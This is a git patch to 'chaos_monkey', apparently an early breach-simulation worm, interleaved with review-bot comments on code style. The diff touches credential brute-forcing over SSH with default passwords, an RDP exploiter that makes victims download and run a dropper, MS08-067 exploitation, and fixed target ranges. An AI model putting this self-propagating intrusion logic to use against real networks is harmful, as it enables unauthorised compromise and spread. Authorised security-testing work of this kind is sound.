From 73f9821ee4a9fec3354b0b961d6487461ed4801b Mon Sep 17 00:00:00 2001 From: Barak Hoffer Date: Wed, 30 Sep 2015 15:05:30 +0300 Subject: [PATCH] minor bug fix --- chaos_monkey/config.py | 11 +++++++---- chaos_monkey/exploit/rdpgrinder.py | 12 ++++++------ chaos_monkey/exploit/smbexec.py | 3 ++- chaos_monkey/exploit/sshexec.py | 15 ++++++++++++++- chaos_monkey/exploit/win_ms08_067.py | 1 + chaos_monkey/network/network_scanner.py | 9 +++++++-- chaos_monkey/network/sshfinger.py | 2 +- chaos_monkey/network/tools.py | 2 +- 8 files changed, 39 insertions(+), 16 deletions(-) diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py index 6ce461499..62f37338f 100644 --- a/chaos_monkey/config.py +++ b/chaos_monkey/config.py @@ -96,6 +96,8 @@ class Configuration(object): ### monkey config ########################### + alive = True + singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}" # how long to wait between scan iterations @@ -127,11 +129,11 @@ class Configuration(object): #range_class = RelativeRange range_size = 8 - range_class = ClassCRange - range_fixed = ("10.0.0.1") + range_class = FixedRange + range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87") # TCP Scanner - tcp_target_ports = [22, 445, 135] + tcp_target_ports = [22, 445, 135, 3389] tcp_scan_timeout = 1000 # 1000 Milliseconds tcp_scan_interval = 200 tcp_scan_get_banner = True @@ -157,6 +159,7 @@ class Configuration(object): ssh_user = "root" ssh_passwords = ["root", "toor", "1234", "12345678"] - alive = True + #rdp exploiter + rdp_use_vbs_download = True WormConfiguration = Configuration() \ No newline at end of file diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py index 6a942c96c..7f9ac0d51 100644 --- a/chaos_monkey/exploit/rdpgrinder.py +++ b/chaos_monkey/exploit/rdpgrinder.py 
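Review bot: The second config.py hunk switches the default `range_class` to `FixedRange` and bakes four concrete addresses into `range_fixed`, which reads like a local test setup committed into the shipped defaults. For a self-propagating tool the default range is the blast-radius control, so the committed default should not name real hosts; I would ship `range_fixed = ()` and keep the lab addresses in a local override. If the intent really is to change the default strategy, a one-line comment stating that `FixedRange` scans only the listed addresses and nothing derived from the local interfaces would help the next reader.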
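Review bot: The new `rdp_use_vbs_download` flag in the third config.py hunk has no description of what the two download paths are, and its header `#rdp exploiter` does not match the file's `# TCP Scanner` comment style. I would write `# RDP exploiter: fetch the dropper over HTTP with a VBScript downloader instead of BITS` above it, assuming that is what the RDP_CMDLINE_HTTP_VBS / RDP_CMDLINE_HTTP_BITS templates do — they are not part of this patch, so please confirm.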
@@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail from logging import getLogger from exploit import HostExploiter from exploit.tools import HTTPTools -from model import RDP_CMDLINE_HTTP_BITS +from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from model.host import VictimHost from network.tools import check_port_tcp from exploit.tools import get_target_monkey @@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter): # create server for http download. http_path, http_thread = HTTPTools.create_transfer(host, src_path) - command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path} + if self._config.rdp_use_vbs_download: + command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path} + else: + command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path} passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) @@ -288,10 +291,7 @@ class RdpExploiter(HostExploiter): if not exploited: LOG.debug("Exploiter RdpGrinder failed, rdp failed.") return False - elif http_thread.downloads == 0: - LOG.info("Trying rdp logging into victim %r with user" - " %s and password '%s'", host, - self._config.psexec_user, password) + elif http_thread.downloads == 0: LOG.debug("Exploiter RdpGrinder failed, http download failed.") return False diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 15f81b471..dfa903197 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py @@ -3,6 +3,7 @@ from logging import getLogger from model.host import VictimHost from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED from exploit import HostExploiter +from network.tools import check_port_tcp from exploit.tools import SmbTools, get_target_monkey from network import SMBFinger 
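Review bot: Both branches of the new `if self._config.rdp_use_vbs_download` build the same substitution dict and differ only in the template, so the dict is duplicated and will drift the next time a key is added. Select the template and format once: `template = RDP_CMDLINE_HTTP_VBS if self._config.rdp_use_vbs_download else RDP_CMDLINE_HTTP_BITS` followed by `command = template % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path': http_path}`. Note that `monkey_name` now comes from `dropper_target_path` while the `HTTPTools.create_transfer` call two lines above still serves `src_path`; if the served filename must match the name embedded in the command, please confirm the two agree. The enclosing method begins and ends outside this hunk.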
@@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter): is_nb_open,_ = check_port_tcp(host.ip_addr, 139) if is_nb_open: host.os['type'] = 'windows' - return super(HostExploiter, self).is_os_supported(host) + return host.os.get('type') in self._target_os_type return False def exploit_host(self, host, src_path=None): diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py index 3c0bbf085..0230717d2 100644 --- a/chaos_monkey/exploit/sshexec.py +++ b/chaos_monkey/exploit/sshexec.py @@ -5,10 +5,12 @@ import logging from exploit import HostExploiter from model import MONKEY_ARG from exploit.tools import get_target_monkey +from network.tools import check_port_tcp __author__ = 'hoffer' LOG = logging.getLogger(__name__) +SSH_PORT = 22 class SSHExploiter(HostExploiter): _target_os_type = ['linux', None] @@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) + port = SSH_PORT + for servkey,servdata in host.services.items(): + if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): + port = int(servkey.replace('tcp-','')) + + is_open,_ = check_port_tcp(host.ip_addr, port) + if not is_open: + LOG.info("SSH port is closed on %r, skipping", host) + return False + passwords = list(self._config.ssh_passwords[:]) known_password = host.get_credentials(self._config.ssh_user) if known_password is not None: @@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter): try: ssh.connect(host.ip_addr, username=self._config.ssh_user, - password=password) + password=password, + port=port) LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, self._config.ssh_user, password) diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 82eae5218..e3f48ceb4 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py 
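Review bot: The replacement line inlines the OS check (`host.os.get('type') in self._target_os_type`) instead of correcting the `super()` target, so `SmbExploiter.is_os_supported` now carries its own copy of logic the base class presumably implements — the removed line was trying to call it. `return super(SmbExploiter, self).is_os_supported(host)` fixes the original mistake (`super(HostExploiter, self)` skipped HostExploiter itself and resolved to `object`) and keeps the two checks in sync. The method's `def` line is above this hunk, so I cannot see whether anything else in it depends on the inlined form.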
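Review bot: The new port-discovery loop in sshexec.py never breaks, so on a host advertising more than one `ssh` service the last matching key wins rather than the first, and `servkey.replace('tcp-','')` strips every occurrence of the substring instead of the prefix. I would change the body to `port = int(servkey[len('tcp-'):])` and add `break` right after it. Also, `int()` raises ValueError on a malformed service key and would abort `exploit_host` for that host; if the scanner always writes keys as `tcp-<port>` that is fine, otherwise guard it. The enclosing method's signature is above this hunk.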
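Review bot: The `LOG.debug` call immediately below the changed `ssh.connect(...)` writes the working password in cleartext to the log, and this hunk is the natural place to tidy it while the `port=port` keyword is being added. Even in an authorized testing tool the log file is usually less protected than the credential store that `host.get_credentials` reads from, and the host and user already identify the successful entry: `LOG.debug("Successfully logged in %r using SSH (user %s)", host, self._config.ssh_user)`. The surrounding try block starts above this hunk.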
@@ -15,6 +15,7 @@ from model.host import VictimHost from model import DROPPER_CMDLINE, MONKEY_CMDLINE from exploit import HostExploiter from exploit.tools import SmbTools, get_target_monkey +from network.tools import check_port_tcp try: from impacket import smb diff --git a/chaos_monkey/network/network_scanner.py b/chaos_monkey/network/network_scanner.py index c6f3bfa27..9e05a6222 100644 --- a/chaos_monkey/network/network_scanner.py +++ b/chaos_monkey/network/network_scanner.py @@ -5,6 +5,7 @@ import logging from network import HostScanner from config import WormConfiguration from info import local_ips +from network.range import * __author__ = 'itamar' @@ -26,8 +27,12 @@ class NetworkScanner(object): LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses) - self._ranges = [WormConfiguration.range_class(ip_address) - for ip_address in self._ip_addresses] + # for fixed range, only scan once. + if WormConfiguration.range_class is FixedRange: + self._ranges = [WormConfiguration.range_class('0.0.0.0')] + else: + self._ranges = [WormConfiguration.range_class(ip_address) + for ip_address in self._ip_addresses] LOG.info("Base local networks to scan are: %r", self._ranges) diff --git a/chaos_monkey/network/sshfinger.py b/chaos_monkey/network/sshfinger.py index c86dccda7..ddb90bc19 100644 --- a/chaos_monkey/network/sshfinger.py +++ b/chaos_monkey/network/sshfinger.py @@ -13,7 +13,7 @@ from model.host import VictimHost SSH_PORT = 22 SSH_SERVICE = 'tcp-22' SSH_REGEX = 'SSH-\d\.\d-OpenSSH' -TIMEOUT = 30 +TIMEOUT = 10 BANNER_READ = 1024 LINUX_DIST_SSH = ['ubuntu', 'debian'] diff --git a/chaos_monkey/network/tools.py b/chaos_monkey/network/tools.py index c415bd9a7..9e945924d 100644 --- a/chaos_monkey/network/tools.py +++ b/chaos_monkey/network/tools.py @@ -1,7 +1,7 @@ import socket import select -DEFAULT_TIMEOUT = 30 +DEFAULT_TIMEOUT = 10 BANNER_READ = 1024 def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
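Review bot: The new `from network.range import *` in network_scanner.py pulls every public name of `network.range` into this module, while the only name the patch uses is `FixedRange` in the hunk below. A star import hides what the module depends on and can shadow names the file already imports explicitly (`HostScanner`, `WormConfiguration`, `local_ips`); `from network.range import FixedRange` says exactly what is needed.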
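Review bot: `WormConfiguration.range_class is FixedRange` is an identity test on the class object, so a subclass of FixedRange configured as `range_class` would fall through to the per-interface branch and be instantiated once per local IP. `if issubclass(WormConfiguration.range_class, FixedRange):` expresses the intent; the `'0.0.0.0'` argument also deserves a comment, since it appears to be a placeholder the fixed range ignores — `# FixedRange ignores the base address; scan the configured list once` (network.range is not in this patch, so please confirm). The enclosing method's signature is above this hunk.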
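Review bot: `TIMEOUT` in sshfinger.py and `DEFAULT_TIMEOUT` in network/tools.py are both lowered from 30 to 10 in this patch, so the same tuning now lives in two places and the next adjustment has to remember both. sshfinger could reuse the shared value, `from network.tools import DEFAULT_TIMEOUT as TIMEOUT`, or a comment should say why the fingerprinter needs its own. A 10-second connect/banner wait is a behaviour change on slow links, so a short note on the chosen value would help.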